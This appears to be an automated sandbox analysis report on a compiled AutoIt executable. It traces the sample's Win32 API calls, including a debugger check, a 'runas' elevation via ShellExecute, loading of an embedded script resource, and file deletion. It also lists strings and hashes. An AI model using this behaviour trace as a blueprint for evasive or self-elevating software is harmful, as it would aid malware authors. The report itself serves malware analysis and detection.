105502->105437 105503->105392 105504->105397 105505->105432 105507 d70d53 __write 105506->105507 105508 d70d77 105507->105508 105509 d70d60 105507->105509 105511 d70e3b 105508->105511 105514 d70d8b 105508->105514 105510 d68af4 __write 59 API calls 105509->105510 105513 d70d65 105510->105513 105512 d68af4 __write 59 API calls 105511->105512 
105518 d70dae 105512->105518 105515 d68b28 ___wstrgtold12_l 59 API calls 105513->105515 105516 d70db6 105514->105516 105517 d70da9 105514->105517 105531 d70d6c __write 105515->105531 105520 d70dc3 105516->105520 105521 d70dd8 105516->105521 105519 d68af4 __write 59 API calls 105517->105519 105524 d68b28 ___wstrgtold12_l 59 API calls 105518->105524 105519->105518 105522 d68af4 __write 59 API calls 105520->105522 105523 d6d206 ___lock_fhandle 60 API calls 105521->105523 105525 d70dc8 105522->105525 105526 d70dde 105523->105526 105527 d70dd0 105524->105527 105528 d68b28 ___wstrgtold12_l 59 API calls 105525->105528 105529 d70e04 105526->105529 105530 d70df1 105526->105530 105533 d68db6 ___wstrgtold12_l 9 API calls 105527->105533 105528->105527 105534 d68b28 ___wstrgtold12_l 59 API calls 105529->105534 105532 d70e5b __read_nolock 71 API calls 105530->105532 105531->105463 105535 d70dfd 105532->105535 105533->105531 105536 d70e09 105534->105536 105538 d70e33 __read LeaveCriticalSection 105535->105538 105537 d68af4 __write 59 API calls 105536->105537 105537->105535 105538->105531 105539->105455 105540->105464 105541->105458 105545 d6520a GetSystemTimeAsFileTime 105542->105545 105544 da8f6e 105544->105135 105546 d65238 __aulldiv 105545->105546 105546->105544 105548 d65c6c __write 105547->105548 105549 d65c93 105548->105549 105550 d65c7e 105548->105550 105552 d66c11 __lock_file 60 API calls 105549->105552 105561 d68b28 59 API calls __getptd_noexit 105550->105561 105554 d65c99 105552->105554 105553 d65c83 105562 d68db6 9 API calls ___wstrgtold12_l 105553->105562 105563 d658d0 68 API calls 5 library calls 105554->105563 105557 d65ca4 105564 d65cc4 LeaveCriticalSection LeaveCriticalSection _fseek 105557->105564 105558 d65c8e __write 105558->105140 105560 d65cb6 105560->105558 105561->105553 105562->105558 105563->105557 105564->105560 105565->104993 105582 d48740 105566->105582 105568 d489c3 105569 d48a3d 105568->105569 105570 d489cd 105568->105570 105591 d49d3c 61 API calls 
Execution Graph (text rendering of the report's interactive call graph). Only node ids, code addresses and id->id edges survive, so the graph itself cannot be reconstructed here; what can be recovered is the labelling on the nodes. The traced code sits at 0xd4xxxx-0xdcxxxx and runs on C-runtime internals (__write, __lock_file, __fcloseall, __malloc_crt, _free, __getptd_noexit, __wsetenvp, __flsbuf, __flush, __lseek_nolock, _memmove, _memset, _wcscpy, _wcscat), with the report's recurring "Mailbox" node label and "N API calls" / "N library calls" counters on many nodes; a separate small cluster at 0x99xxxx carries nodes labelled GetPEB and Sleep.
Win32 APIs named on nodes in this span: file and path handling (CreateFileW, ReadFile, WriteFile, SetFilePointerEx, CloseHandle, GetFullPathNameW, GetLongPathNameW, SetCurrentDirectoryW, GetStdHandle); registry (RegOpenKeyExW, RegQueryValueExW, RegCloseKey); system and version probing (GetVersionExW, GetCurrentProcess, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, LoadLibraryA, GetProcAddress, FreeLibrary, GetSystemTimeAsFileTime); console output (GetConsoleMode, GetConsoleCP, WriteConsoleW, WideCharToMultiByte); synchronisation and threads (EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, InitializeCriticalSectionAndSpinCount, CreateThread, Sleep); window, timer and tray UI (OleInitialize, RegisterWindowMessageW, DefWindowProcW, PostQuitMessage, SetTimer, KillTimer, CreatePopupMenu, MoveWindow, SetFocus, Shell_NotifyIconW, DeleteObject, DestroyWindow); string classification (GetStringTypeW, CharUpperBuffW); and GetLastError.
107308->107328 107455 d458ba CloseHandle 107308->107455 107312 dad126 107309->107312 107314 d60db6 Mailbox 60 API calls 107310->107314 107313 d60db6 Mailbox 60 API calls 107311->107313 107315 dad178 107312->107315 107316 da3c37 3 API calls 107312->107316 107317 dad29a 107313->107317 107318 dad263 107314->107318 107453 d49b3c 60 API calls 107315->107453 107321 dad136 107316->107321 107324 d47667 60 API calls 107317->107324 107317->107328 107322 dad274 107318->107322 107325 d47667 60 API calls 107318->107325 107321->107315 107323 dad13a 107321->107323 107456 dbfbce 60 API calls 2 library calls 107322->107456 107326 d47de1 60 API calls 107323->107326 107324->107328 107325->107322 107329 dad147 107326->107329 107328->107229 107452 da3a2a 64 API calls Mailbox 107329->107452 107331 dad150 Mailbox 107331->107315 107333 dbcadd 131 API calls 107332->107333 107334 dbdf33 107333->107334 107334->107229 107336 d47667 60 API calls 107335->107336 107337 dbc2f4 107336->107337 107338 d47667 60 API calls 107337->107338 107339 dbc2fc 107338->107339 107340 d47667 60 API calls 107339->107340 107341 dbc304 107340->107341 107342 d49837 85 API calls 107341->107342 107353 dbc312 107342->107353 107343 dbc528 Mailbox 107343->107229 107344 d47bcc 60 API calls 107344->107353 107345 d47924 60 API calls 107345->107353 107347 dbc4e2 107348 d47cab 60 API calls 107347->107348 107350 dbc4ef 107348->107350 107349 dbc4fd 107351 d47cab 60 API calls 107349->107351 107355 d47b2e 60 API calls 107350->107355 107356 dbc50c 107351->107356 107352 d48047 60 API calls 107352->107353 107353->107343 107353->107344 107353->107345 107353->107347 107353->107349 107353->107352 107354 d47e4f 60 API calls 107353->107354 107357 d47e4f 60 API calls 107353->107357 107359 dbc4fb 107353->107359 107364 d49837 85 API calls 107353->107364 107365 d47cab 60 API calls 107353->107365 107366 d47b2e 60 API calls 107353->107366 107358 dbc3a9 CharUpperBuffW 107354->107358 107355->107359 107360 d47b2e 60 API calls 107356->107360 107361 
dbc469 CharUpperBuffW 107357->107361 107457 d4843a 69 API calls 107358->107457 107359->107343 107459 d49a3c 60 API calls Mailbox 107359->107459 107360->107359 107458 d4c5a7 70 API calls 2 library calls 107361->107458 107364->107353 107365->107353 107366->107353 107368 da7962 107367->107368 107369 d60db6 Mailbox 60 API calls 107368->107369 107370 da7970 107369->107370 107371 da797e 107370->107371 107372 d47667 60 API calls 107370->107372 107371->107229 107372->107371 107460 d960c0 107373->107460 107375 d9618c 107375->107229 107376->107219 107377->107219 107378->107229 107379->107239 107380->107228 107381->107202 107382->107229 107383->107210 107384->107236 107385->107236 107386->107236 107387->107221 107388->107224 107389->107221 107391 d455a2 107390->107391 107392 d4557d 107390->107392 107393 d47d8c 60 API calls 107391->107393 107392->107391 107397 d4558c 107392->107397 107396 da325e 107393->107396 107394 da328d 107394->107277 107396->107394 107414 da31fa ReadFile SetFilePointerEx 107396->107414 107415 d47924 60 API calls 2 library calls 107396->107415 107416 d45ab8 107397->107416 107404 da339c Mailbox 107404->107277 107405->107253 107406->107280 107407->107281 107408->107252 107409->107252 107410->107259 107411->107266 107412->107273 107413->107279 107414->107396 107415->107396 107417 d60db6 Mailbox 60 API calls 107416->107417 107418 d45acb 107417->107418 107419 d60db6 Mailbox 60 API calls 107418->107419 107420 d45ad7 107419->107420 107421 d454d2 107420->107421 107428 d458cf 107421->107428 107423 d45bc0 2 API calls 107425 d454e3 107423->107425 107424 d45514 107424->107404 107427 d477da 62 API calls Mailbox 107424->107427 107425->107423 107425->107424 107435 d45a7a 107425->107435 107427->107404 107429 d458e0 107428->107429 107430 d7dc3c 107428->107430 107429->107425 107444 d95ecd 60 API calls Mailbox 107430->107444 107432 d7dc46 107433 d60db6 Mailbox 60 API calls 107432->107433 107434 d7dc52 107433->107434 107436 d7dcee 107435->107436 107437 d45a8e 107435->107437 
107450 d95ecd 60 API calls Mailbox 107436->107450 107445 d459b9 107437->107445 107440 d45a9a 107440->107425 107441 d7dcf9 107442 d60db6 Mailbox 60 API calls 107441->107442 107443 d7dd0e _memmove 107442->107443 107444->107432 107446 d459d1 107445->107446 107449 d459ca _memmove 107445->107449 107447 d60db6 Mailbox 60 API calls 107446->107447 107448 d7dc7e 107446->107448 107447->107449 107449->107440 107450->107441 107451->107287 107452->107331 107453->107289 107454->107293 107455->107328 107456->107328 107457->107353 107458->107353 107459->107343 107461 d960e8 107460->107461 107462 d960cb 107460->107462 107461->107375 107462->107461 107464 d960ab 60 API calls Mailbox 107462->107464 107464->107462 107465 d4552a 107466 d45ab8 60 API calls 107465->107466 107467 d4553c 107466->107467 107468 d454d2 62 API calls 107467->107468 107469 d4554a 107468->107469 107471 d4555a Mailbox 107469->107471 107472 d48061 62 API calls Mailbox 107469->107472 107472->107471 107473 d4e5ab 107476 d4d100 107473->107476 107475 d4e5b9 107477 d4d11d 107476->107477 107504 d4d37d 107476->107504 107478 d826e0 107477->107478 107479 d82691 107477->107479 107507 d4d144 107477->107507 107523 dba3e6 342 API calls __cinit 107478->107523 107482 d82694 107479->107482 107489 d826af 107479->107489 107483 d826a0 107482->107483 107482->107507 107521 dba9fa 342 API calls 107483->107521 107485 d62d40 __cinit 68 API calls 107485->107507 107487 d828b5 107487->107487 107488 d4d54b 107488->107475 107489->107504 107522 dbaea2 342 API calls 3 library calls 107489->107522 107490 d4d434 107516 d48a52 69 API calls 107490->107516 107493 d48740 69 API calls 107493->107507 107494 d4d443 107494->107475 107495 d827fc 107527 dba751 90 API calls 107495->107527 107499 d484c0 70 API calls 107499->107507 107504->107488 107528 da9e4a 90 API calls 4 library calls 107504->107528 107506 d49ea0 342 API calls 107506->107507 107507->107485 107507->107488 107507->107490 107507->107493 107507->107495 107507->107499 107507->107504 
107507->107506 107508 d48047 60 API calls 107507->107508 107510 d49dda 107507->107510 107515 d48542 69 API calls 107507->107515 107517 d4843a 69 API calls 107507->107517 107518 d4cf7c 342 API calls 107507->107518 107519 d4cf00 90 API calls 107507->107519 107520 d4cd7d 342 API calls 107507->107520 107524 d48a52 69 API calls 107507->107524 107525 d49d3c 61 API calls Mailbox 107507->107525 107526 d9678d 61 API calls 107507->107526 107508->107507 107511 d60db6 Mailbox 60 API calls 107510->107511 107512 d49de7 107511->107512 107513 d49df6 107512->107513 107514 d47de1 60 API calls 107512->107514 107513->107507 107514->107513 107515->107507 107516->107494 107517->107507 107518->107507 107519->107507 107520->107507 107521->107488 107522->107504 107523->107507 107524->107507 107525->107507 107526->107507 107527->107504 107528->107487

                            Control-flow Graph

                            APIs
                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D43B68
                            • IsDebuggerPresent.KERNEL32 ref: 00D43B7A
                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00E052F8,00E052E0,?,?), ref: 00D43BEB
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                              • Part of subcall function 00D5092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00D43C14,00E052F8,?,?,?), ref: 00D5096E
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00D43C6F
                            • MessageBoxA.USER32 ref: 00D7D281
                            • SetCurrentDirectoryW.KERNEL32(?,00E052F8,?,?,?), ref: 00D7D2B9
                            • GetForegroundWindow.USER32 ref: 00D7D33F
                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00D7D346
                              • Part of subcall function 00D43A46: GetSysColorBrush.USER32 ref: 00D43A50
                              • Part of subcall function 00D43A46: LoadCursorW.USER32 ref: 00D43A5F
                              • Part of subcall function 00D43A46: LoadIconW.USER32 ref: 00D43A76
                              • Part of subcall function 00D43A46: LoadIconW.USER32 ref: 00D43A88
                              • Part of subcall function 00D43A46: LoadIconW.USER32 ref: 00D43A9A
                              • Part of subcall function 00D43A46: LoadImageW.USER32 ref: 00D43AC0
                              • Part of subcall function 00D43A46: RegisterClassExW.USER32(?), ref: 00D43B16
                              • Part of subcall function 00D439D5: CreateWindowExW.USER32 ref: 00D43A03
                              • Part of subcall function 00D439D5: CreateWindowExW.USER32 ref: 00D43A24
                              • Part of subcall function 00D439D5: ShowWindow.USER32(00000000), ref: 00D43A38
                              • Part of subcall function 00D439D5: ShowWindow.USER32(00000000), ref: 00D43A41
                              • Part of subcall function 00D4434A: _memset.LIBCMT ref: 00D44370
                              • Part of subcall function 00D4434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D44415
                            Strings
                            • This is a third-party compiled AutoIt script., xrefs: 00D7D279
                            • runas, xrefs: 00D7D33A
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                            • String ID: This is a third-party compiled AutoIt script.$runas
                            • API String ID: 529118366-3287110873
                            • Opcode ID: 0b1b3b5c41c0fa7ae46590d270224702e8e279cae58ef9a2a68c6da7470cc0fd
                            • Instruction ID: c7233b53f2cc5158e042d14dafc17036ab38d544d4d47cd8f6ddfac173c1bc63
                            • Opcode Fuzzy Hash: 0b1b3b5c41c0fa7ae46590d270224702e8e279cae58ef9a2a68c6da7470cc0fd
                            • Instruction Fuzzy Hash: DB51B132D08249AFDF01ABB9DC46EEE7B79EF45700B148065F451B21A2DA61968ACF31

                            Control-flow Graph

                            control_flow_graph 994 d449a0-d44a00 call d47667 GetVersionExW call d47bcc ... (node/edge listing of the interactive graph rendering omitted; the APIs reached, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, FreeLibrary and GetSystemInfo, are itemised under "APIs" below)
                            APIs
                            • GetVersionExW.KERNEL32(?), ref: 00D449CD
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            • GetCurrentProcess.KERNEL32(?,00DCFAEC,00000000,00000000,?), ref: 00D44A9A
                            • IsWow64Process.KERNEL32(00000000), ref: 00D44AA1
                            • GetNativeSystemInfo.KERNEL32(00000000), ref: 00D44AE7
                            • FreeLibrary.KERNEL32(00000000), ref: 00D44AF2
                            • GetSystemInfo.KERNEL32(00000000), ref: 00D44B23
                            • GetSystemInfo.KERNEL32(00000000), ref: 00D44B2F
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                            • String ID:
                            • API String ID: 1986165174-0
                            • Opcode ID: ea6463f98a8a2f60101f6814f6b9a68882e8fded8aa576e35b46a921c5a408f3
                            • Instruction ID: e85e9b5db517ac88adcd3d444308fd7a624ef99ff2718948a709ae9185be9ef3
                            • Opcode Fuzzy Hash: ea6463f98a8a2f60101f6814f6b9a68882e8fded8aa576e35b46a921c5a408f3
                            • Instruction Fuzzy Hash: 3491C4319897C1DFC731CB6885516AAFFF5AF29304B484DADD0CB93A41D620E548C77A

                            Control-flow Graph

                            control_flow_graph 1102 d44e89-d44ea1 CreateStreamOnHGlobal -> d44ea3-d44eba FindResourceExW -> d7d933-d7d942 LoadResource -> d7d948-d7d956 SizeofResource -> d7d95c-d7d967 LockResource -> d7d96d-d7d98b (failure edges from each call return to d44ec0/d44ec1-d44ec6; node listing of the interactive graph rendering condensed)
                            APIs
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00D44E99
                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D44D8E,?,?,00000000,00000000), ref: 00D44EB0
                            • LoadResource.KERNEL32(?,00000000,?,?,00D44D8E,?,?,00000000,00000000,?,?,?,?,?,?,00D44E2F), ref: 00D7D937
                            • SizeofResource.KERNEL32(?,00000000,?,?,00D44D8E,?,?,00000000,00000000,?,?,?,?,?,?,00D44E2F), ref: 00D7D94C
                            • LockResource.KERNEL32(00D44D8E,?,?,00D44D8E,?,?,00000000,00000000,?,?,?,?,?,?,00D44E2F,00000000), ref: 00D7D95F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                            • String ID: SCRIPT
                            • API String ID: 3051347437-3967369404
                            • Opcode ID: 2641f8c29308cf4dc0e396143db433ab8e4e1f057d574182047cfc36e6b447cf
                            • Instruction ID: 72a909603033b0d20e0a4138852fa4282e0c889bf8c9959ca4769e8b89ba1d41
                            • Opcode Fuzzy Hash: 2641f8c29308cf4dc0e396143db433ab8e4e1f057d574182047cfc36e6b447cf
                            • Instruction Fuzzy Hash: 6A114C75240702AFD7218B65EC48F67BBBAEBC5B11F144268F505C6250DB61E8408A70
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID: Dd$Dd$Dd$Dd$Variable must be of type 'Object'.
                            • API String ID: 0-2781164977
                            • Opcode ID: 059bf477fa3c05f6aec13cb83748b93ccbbdcd9511d06e084bb13ce762abc9d8
                            • Instruction ID: 9e245ed572d8af9a64975c7d3957d92840435f5f08c77b8535705331e4b1c2c8
                            • Opcode Fuzzy Hash: 059bf477fa3c05f6aec13cb83748b93ccbbdcd9511d06e084bb13ce762abc9d8
                            • Instruction Fuzzy Hash: 66A29E74A00215EFCB24CF58C480AAEB7B2FF59314F288569E855AB351D735ED86CBB0
                            APIs
                            • GetFileAttributesW.KERNELBASE(?,00D7E398), ref: 00DA446A
                            • FindFirstFileW.KERNELBASE(?,?), ref: 00DA447B
                            • FindClose.KERNEL32(00000000), ref: 00DA448B
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FileFind$AttributesCloseFirst
                            • String ID:
                            • API String ID: 48322524-0
                            • Opcode ID: 1cce6cd0794ec7b62fbc5ce4a1f261683bb3db07a03cd213a704f9ddc89f415f
                            • Instruction ID: 2c08276d029c1c0dca761553a1483c6ca036c11247800549cdb3e38c1eaf0d42
                            • Opcode Fuzzy Hash: 1cce6cd0794ec7b62fbc5ce4a1f261683bb3db07a03cd213a704f9ddc89f415f
                            • Instruction Fuzzy Hash: 43E0D8324106026742106B38EC0D9E9B75DDE4A335F140715F835C11D0E7F4990095B5
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D50A5B
                            • timeGetTime.WINMM ref: 00D50D16
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D50E53
                            • Sleep.KERNEL32(0000000A), ref: 00D50E61
                            • LockWindowUpdate.USER32(00000000), ref: 00D50EFA
                            • DestroyWindow.USER32 ref: 00D50F06
                            • GetMessageW.USER32 ref: 00D50F20
                            • Sleep.KERNEL32(0000000A,?,?), ref: 00D84E83
                            • TranslateMessage.USER32(?), ref: 00D85C60
                            • DispatchMessageW.USER32(?), ref: 00D85C6E
                            • GetMessageW.USER32 ref: 00D85C82
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb$pb$pb$pb
                            • API String ID: 4212290369-1420604165
                            • Opcode ID: 4947b7747c137806375d0591f0a6684668237799dbd0418b7504ffa21a37443c
                            • Instruction ID: dcb363eb771f53766e86034ab1b1e583d0f571d6332a68bc4c8fe3edbdafefa4
                            • Opcode Fuzzy Hash: 4947b7747c137806375d0591f0a6684668237799dbd0418b7504ffa21a37443c
                            • Instruction Fuzzy Hash: 0FB2A170604741DFDB24EF24C885BAABBE5FF85304F18491DE899972A1DB71E848CB72

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00DA8F5F: __time64.LIBCMT ref: 00DA8F69
                              • Part of subcall function 00D44EE5: _fseek.LIBCMT ref: 00D44EFD
                            • __wsplitpath.LIBCMT ref: 00DA9234
                              • Part of subcall function 00D640FB: __wsplitpath_helper.LIBCMT ref: 00D6413B
                            • _wcscpy.LIBCMT ref: 00DA9247
                            • _wcscat.LIBCMT ref: 00DA925A
                            • __wsplitpath.LIBCMT ref: 00DA927F
                            • _wcscat.LIBCMT ref: 00DA9295
                            • _wcscat.LIBCMT ref: 00DA92A8
                              • Part of subcall function 00DA8FA5: _memmove.LIBCMT ref: 00DA8FDE
                              • Part of subcall function 00DA8FA5: _memmove.LIBCMT ref: 00DA8FED
                            • _wcscmp.LIBCMT ref: 00DA91EF
                              • Part of subcall function 00DA9734: _wcscmp.LIBCMT ref: 00DA9824
                              • Part of subcall function 00DA9734: _wcscmp.LIBCMT ref: 00DA9837
                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00DA9452
                            • _wcsncpy.LIBCMT ref: 00DA94C5
                            • DeleteFileW.KERNEL32(?,?), ref: 00DA94FB
                            • CopyFileW.KERNEL32 ref: 00DA9511
                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DA9522
                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DA9534
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                            • String ID:
                            • API String ID: 1500180987-0
                            • Opcode ID: 992e86eb71440f9aecdc562604c1f31673e8a7faf618c08a8426826b37127e57
                            • Instruction ID: 7b5bb69cffb2a7af6c75fb9b0e343a4214fe9bbdacb2b05e7806ff554d971e8b
                            • Opcode Fuzzy Hash: 992e86eb71440f9aecdc562604c1f31673e8a7faf618c08a8426826b37127e57
                            • Instruction Fuzzy Hash: F1C129B1D00229ABDF21DFA5CC95ADEB7BDEF45310F0040AAF609E6151EB309A858F75

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00D44706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E052F8,?,00D437AE,?), ref: 00D44724
                              • Part of subcall function 00D6050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00D47165), ref: 00D6052D
                            • RegOpenKeyExW.KERNEL32 ref: 00D471A8
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D7E8C8
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 00D7E909
                            • RegCloseKey.ADVAPI32(?), ref: 00D7E947
                            • _wcscat.LIBCMT ref: 00D7E9A0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                            • API String ID: 2673923337-2727554177
                            • Opcode ID: f55e031e31ebf177617d9d2f9dc47d5d2491fd36cfbe75e02fc935922899305f
                            • Instruction ID: 60c9f46c297d8f371afb2f604919d1b0a98bfe3d1026ff9d61397526911720f0
                            • Opcode Fuzzy Hash: f55e031e31ebf177617d9d2f9dc47d5d2491fd36cfbe75e02fc935922899305f
                            • Instruction Fuzzy Hash: 207172715083019FC704EF26EC41AABBBE8FF88310B44492EF545971B1EB719998CB71

                            Control-flow Graph

                            APIs
                            • GetSysColorBrush.USER32 ref: 00D43A50
                            • LoadCursorW.USER32 ref: 00D43A5F
                            • LoadIconW.USER32 ref: 00D43A76
                            • LoadIconW.USER32 ref: 00D43A88
                            • LoadIconW.USER32 ref: 00D43A9A
                            • LoadImageW.USER32 ref: 00D43AC0
                            • RegisterClassExW.USER32(?), ref: 00D43B16
                              • Part of subcall function 00D43041: GetSysColorBrush.USER32 ref: 00D43074
                              • Part of subcall function 00D43041: RegisterClassExW.USER32(00000030), ref: 00D4309E
                              • Part of subcall function 00D43041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D430AF
                              • Part of subcall function 00D43041: InitCommonControlsEx.COMCTL32(?), ref: 00D430CC
                              • Part of subcall function 00D43041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D430DC
                              • Part of subcall function 00D43041: LoadIconW.USER32 ref: 00D430F2
                              • Part of subcall function 00D43041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D43101
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
